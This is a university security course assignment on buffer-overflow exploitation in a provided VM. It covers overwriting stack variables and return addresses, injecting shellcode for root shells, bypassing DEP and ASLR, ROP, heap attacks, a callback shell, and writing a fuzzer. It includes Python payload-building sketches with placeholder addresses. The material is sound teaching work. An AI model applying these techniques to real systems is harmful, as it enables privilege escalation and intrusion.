EECS 388 Project 4: Application Security

This project will introduce you to control-flow hijacking vulnerabilities in application software, including buffer overflows. We will provide a series of vulnerable programs and a virtual machine environment in which you will develop exploits.

Objectives
•  Be able to identify and avoid buffer overflow vulnerabilities in native code

•  Understand the severity of buffer overflows and the necessity of standard defenses

•  Gain familiarity with machine architecture and assembly language

GDB You will make extensive use of the GDB debugger, which you should recall from EECS 280. Useful commands that you may not know are “disassemble”, “info reg”, “x”, and “stepi”. See the GDB help for details, and don’t be afraid to experiment! This quick reference may also be useful: https://eecs388.org/*/gdb-refcard.pdf.

x86 Assembly There are many good references for Intel assembly language, but note that this project targets the 32-bit x86 ISA. The stack is organized differently in x86 and x86_64. If you are reading any online documentation, ensure that it is based on the x86 architecture, not x86_64.

Targets
The target programs for this project are simple, short C programs with (mostly) clear security vulnerabilities. We have provided source code and a Makefile that compiles all the targets. Your exploits must work against the targets as compiled and executed within the provided VM.

target0: Overwriting a variable on the stack                           (Difficulty: Easy)
This program takes input from stdin and prints a message. Your job is to provide input that causes the program to output: “Hi uniqname! Your grade is A+.” (You can use either group member’s uniqname.) To accomplish this, your input will need to overwrite another variable stored on the stack.

Here’s one approach you might take:

1.   Examine target0.c. Where is the buffer overflow?

2.   Start the debugger (gdb target0) and disassemble _main: (gdb) disas _main. Identify the function calls and the arguments passed to them.

3.   Draw a picture of the stack. How are name[] and grade[] stored relative to each other?

4.   How could a value read into name[] affect the value contained in grade[]? Test your hypothesis by running ./target0 on the command line with different inputs.

target1: Overwriting the return address                                   (Difficulty: Easy)
This program takes input from stdin and prints a message. Your job is to provide input that makes it output: “Your grade is perfect.” Your input will need to overwrite the return address so that the function vulnerable() transfers control to print_good_grade() when it returns.

1.   Examine target1.c. Where is the buffer overflow?

2.   Disassemble print_good_grade. What is its starting address?

3.   Set a breakpoint at the beginning of vulnerable and run the program.

(gdb) break vulnerable

(gdb) run

4.   Disassemble vulnerable and draw the stack. Where is input[] stored relative to %ebp? How long would an input have to be to overwrite this value and the return address?

5.   Examine the %esp and %ebp registers: (gdb) info reg

6.   What are the current values of the saved frame pointer and return address from the stack frame? You can examine two words of memory at %ebp using: (gdb) x/2wx $ebp

7.   What should these values be in order to redirect control to the desired function?
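As a rough illustration of step 7, the sketch below shows one way such an input could be assembled in Python 3. The offset and the address are placeholders invented for this example, not values from the real target; the real ones have to be read from GDB. Because x86 is little-endian, a 32-bit address is packed least significant byte first.

```python
import struct

# Hypothetical values for illustration only; find the real ones with GDB.
OFFSET_TO_SAVED_EBP = 16        # bytes from the start of input[] to the saved %ebp
PRINT_GOOD_GRADE = 0x08048EB4   # placeholder address of print_good_grade


def build_payload(offset, target_addr):
    """Return filler + dummy saved %ebp + new return address."""
    filler = b"A" * offset                     # fills the buffer up to the saved %ebp
    saved_ebp = b"BBBB"                        # overwrites the saved frame pointer
    ret_addr = struct.pack("<I", target_addr)  # 32-bit little-endian address
    return filler + saved_ebp + ret_addr


payload = build_payload(OFFSET_TO_SAVED_EBP, PRINT_GOOD_GRADE)
```

In Python 3 the raw bytes can be written to stdout with sys.stdout.buffer.write(payload) so that no text encoding is applied.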

target2: Redirecting control to shellcode                                                           
The remaining targets are owned by the root user and have the suid bit set. Your goal is to cause them to launch a shell, which will therefore have root privileges. This and later targets all take input as command-line arguments rather than from stdin. Unless otherwise noted, you should use the shellcode we have provided in shellcode.py. Successfully placing this shellcode in memory and setting the instruction pointer to the beginning of the shellcode (e.g., by returning or jumping to it) will open a shell.

1.   Examine target2.c. Where is the buffer overflow?

2.   Create a Python program named sol2.py that outputs the provided shellcode:

from shellcode import shellcode
print shellcode

3.   Set up the target in GDB using the output of your program as its argument:

gdb --args ./target2 $(python sol2.py)

4.   Set a breakpoint in vulnerable and start the target.

5.   Disassemble vulnerable. Where does buf begin relative to %ebp? What’s the current value of %ebp? What will be the starting address of the shellcode?

6.   Identify the address after the call to strcpy and set a breakpoint there:

(gdb) break *0x08048efb

Continue the program until it reaches that breakpoint.

(gdb) cont

7.   Examine the bytes of memory where you think the shellcode is to confirm your calculation:

(gdb) x/32bx 0xaddress

8.   Disassemble the shellcode: (gdb) disas/r 0xaddress,+32 How does it work?

9.   Modify your solution to overwrite the return address and cause it to jump to the beginning of the shellcode.
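The layout that step 9 points toward can be sketched as follows, in Python 3. The shellcode here is a stand-in byte string, and the buffer address and distance are made-up placeholders; the real values come from shellcode.py and from GDB inside the VM. Since the input is copied with strcpy, the sketch also rejects payloads containing a null byte, which would cut the copy short.

```python
import struct

# Stand-in for the provided shellcode; these bytes are NOT real shellcode.
shellcode = b"\xcc" * 24

# Hypothetical values for illustration; read the real ones from GDB.
BUF_ADDR = 0xBFFEF3B8   # placeholder address where buf begins
BUF_TO_RET = 112        # placeholder distance from buf to the return address


def build_payload(code, buf_addr, buf_to_ret):
    """Return code + padding + return address pointing back at the code."""
    if len(code) > buf_to_ret:
        raise ValueError("code does not fit before the return address")
    padding = b"A" * (buf_to_ret - len(code))
    payload = code + padding + struct.pack("<I", buf_addr)
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte; strcpy would stop there")
    return payload


payload = build_payload(shellcode, BUF_ADDR, BUF_TO_RET)
```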

target3: Overwriting the return address indirectly                                          
In this target, the buffer overflow is restricted and cannot directly overwrite the return address. You’ll need to find another way. Your input should cause the provided shellcode to execute and open a root shell.

target4: Beyond strings                                                                                             
This target takes as its command-line argument the name of a data file it will read. The file format is a 32-bit count followed by that many 32-bit integers. Create a data file that causes the provided shellcode to execute and open a root shell.
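To make the file format concrete, here is a minimal Python 3 sketch that encodes a count followed by a list of integers. It assumes unsigned little-endian 32-bit values, which matches 32-bit x86 but is not stated by the target itself. The helper name encode_data and its optional count parameter are hypothetical, added only so the count field can be set independently of the list length when experimenting.

```python
import struct


def encode_data(values, count=None):
    """Encode a 32-bit count followed by the given 32-bit integers.

    Assumes unsigned little-endian encoding. If `count` is omitted,
    the true number of values is used.
    """
    if count is None:
        count = len(values)
    header = struct.pack("<I", count)
    body = b"".join(struct.pack("<I", v) for v in values)
    return header + body


well_formed = encode_data([1, 2])
```

The resulting bytes can be written to a file opened in binary mode ("wb") and the file name passed to the target as its argument.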

target5: Bypassing DEP                                                                                              
This program resembles target2, but it has been compiled with data execution prevention (DEP) enabled. DEP means that the processor will refuse to execute instructions stored on the stack. You can overflow the stack and modify values like the return address, but you can’t jump to any shellcode you inject. You need to find another way to run the command /bin/sh and open a root shell.

target6: Variable stack position                                                                             
When we constructed the previous targets, we ensured that the stack would be in the same position every time the vulnerable function was called, but this is often not the case in real targets. In fact, a defense called ASLR (address-space layout randomization) makes buffer overflows harder to exploit by changing the starting location of the stack and other memory areas on each execution. This target resembles target2, but the stack position is randomly offset by 0–255 bytes each time it runs. You need to construct an input that always opens a root shell despite this randomization.
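One common way to tolerate a small, bounded shift like this is a NOP sled: a run of single-byte no-op instructions (0x90 on x86) placed in front of the shellcode, so that a jump landing anywhere in the run slides forward into the code. The Python 3 sketch below only models the arithmetic. The base address is a placeholder, and the direction of the shift (buffer moving to lower addresses) is an assumption that should be checked in GDB.

```python
NOP = b"\x90"  # single-byte x86 no-op instruction


def build_sled_payload(code, sled_len):
    """Prefix `code` with `sled_len` NOP bytes."""
    return NOP * sled_len + code


def always_lands(guess, base, sled_len, max_shift=255):
    """True if `guess` hits the sled (or the first code byte) for every shift."""
    for shift in range(max_shift + 1):
        start = base - shift  # assumed: the buffer moves down by `shift` bytes
        if not (start <= guess <= start + sled_len):
            return False
    return True


BASE = 0xBFFEF000  # hypothetical buffer address when the shift is zero
```

Under these assumptions, a sled shorter than the full range of shifts cannot cover every case, which always_lands(BASE, BASE, 100) reports as False.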

target7: Heap-based exploitation [Extra credit]                                               
This program implements a doubly linked list on the heap. It takes three command-line arguments. Figure out a way to exploit it to open a root shell. You may need to modify the provided shellcode slightly.

target8: Return-oriented programming [Extra credit]
This target is identical to target2, but it is compiled with DEP enabled. Implement a ROP-based attack to bypass DEP and open a root shell.

target9: Callback shell [Extra credit]                                          (Difficulty: Hard)
This target uses the same code as target3, but you have a different objective. Instead of opening a root shell, write your own shellcode that implements a callback shell. Your shellcode should open a TCP connection to 127.0.0.1 on port 31337. Commands received over this connection should be executed in a shell, and the output should be sent back to the remote machine.

Fuzz Testing
Manually reviewing source code for vulnerabilities can be laborious and time consuming, and outsiders typically cannot do it at all for closed-source software. For these reasons, both attackers and defenders often use an automated form of vulnerability discovery called “fuzz testing” or “fuzzing” that attempts to find edge-cases that the application developers failed to account for. Unlike analysis that makes use of source code (“white-box testing”), fuzzing assumes only the ability to execute the software with chosen inputs (“black-box testing”).

In fuzzing, the analyst creates a program (a “fuzzer”) that emulates a user and rapidly provides many different automatically generated inputs to the target application while monitoring for anomalous behavior (e.g., crashes or corrupted return data). When an input consistently causes anomalous behavior, the fuzzer stores it so that the analyst can investigate the problem. The anomalous behavior may be a sign that there is an exploitable vulnerability in the code path that the input exercises.

It’s not usually feasible to test with every possible input, but a clever input generation algorithm can increase the odds that the fuzzer will trigger a bug. For instance, many fuzzers start with a set of valid inputs and then corrupt them by making randomized changes, additions, or deletions.
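The mutation strategy described above might look roughly like this in Python 3. It is a minimal sketch rather than a tuned fuzzer: the function name mutate, the max_edits parameter, and the equal weighting of the three operations are all choices made for this example.

```python
import random


def mutate(data, rng, max_edits=4):
    """Return a corrupted copy of `data` (bytes) made with a few random edits."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, max_edits)):
        op = rng.choice(("change", "add", "delete"))
        if op == "change" and buf:
            # Overwrite one existing byte with a random value.
            buf[rng.randrange(len(buf))] = rng.randrange(256)
        elif op == "add":
            # Insert one random byte at a random position (including the end).
            buf.insert(rng.randint(0, len(buf)), rng.randrange(256))
        elif op == "delete" and buf:
            # Remove one byte at a random position.
            del buf[rng.randrange(len(buf))]
    return bytes(buf)
```

Passing a seeded generator such as random.Random(0) makes a run repeatable, which helps when a crashing input needs to be reproduced.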

Setup  A recently founded start-up named ZCorp has hit it big by providing data analysis expertise to customers. Customers provide data to analyze in JSON format, and ZCorp charges them based on the number of JSON string values in each customer’s data. In order to generate bills, they run all customer input through a JSON parser that extracts each JSON string value, along with its index.

ZCorp outsourced development of this JSON parser to an acquaintance of one of the founders. Unfortunately for ZCorp, this developer never took EECS 388, so the parser is probably highly vulnerable to exploitation. If you can find an input that causes a SEGFAULT in the parser, ZCorp can refuse to pay the inept developer until the problem has been fixed.

Goal Your goal for this portion of the project is to create a fuzzer that is capable of automatically finding an input that causes a SEGFAULT in the provided JSON parser. You can download the jsonParser binary from https://eecs388.org/*/parser.tar.gz. It reads JSON data from stdin and writes to stdout and stderr. While the developer did not provide ZCorp with the source code for the parser, they did provide a script, jsonParserTests.py, that checks a set of test cases.

You are not required to create an exploit or understand the cause of the SEGFAULT.

You should not attempt to reverse-engineer the target, as this will likely be a waste of time.

What to submit Create a Python program named fuzzer.py that generates inputs, invokes jsonParser on them, and then determines whether there was a SEGFAULT. Your program should do this repeatedly for different inputs until a SEGFAULT occurs. When this happens, it should print the input data that triggered the fault to stdout as a base64-encoded string and exit. You can confirm that the input causes a SEGFAULT via the command:

echo "base64 encoded data" | base64 -d | ./jsonParser

When you find an input that consistently causes a SEGFAULT, place the base64-encoded string in a text file named fuzzInput.txt and submit it along with your program.
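The core loop of such a program could be sketched as below, in Python 3. On POSIX systems, subprocess reports a process killed by signal N with a return code of -N, so a SEGFAULT shows up as -signal.SIGSEGV. The function names, the timeout value, and the choice to treat a timeout as "no crash" are assumptions made for this example.

```python
import base64
import signal
import subprocess


def crashes_with_segfault(cmd, data, timeout=5):
    """Run `cmd` with `data` on stdin; report whether SIGSEGV killed it."""
    try:
        proc = subprocess.run(cmd, input=data, stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return False  # a hang is not a SEGFAULT; skip this input
    return proc.returncode == -signal.SIGSEGV


def fuzz(cmd, candidates):
    """Try each candidate input; return the first one that triggers SIGSEGV."""
    for data in candidates:
        if crashes_with_segfault(cmd, data):
            return data
    return None


def encode_for_report(data):
    """Base64-encode the crashing input for printing to stdout."""
    return base64.b64encode(data).decode("ascii")
```

A caller would pass ["./jsonParser"] as cmd together with a stream of generated inputs, then print encode_for_report(found) once fuzz returns a crashing input.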
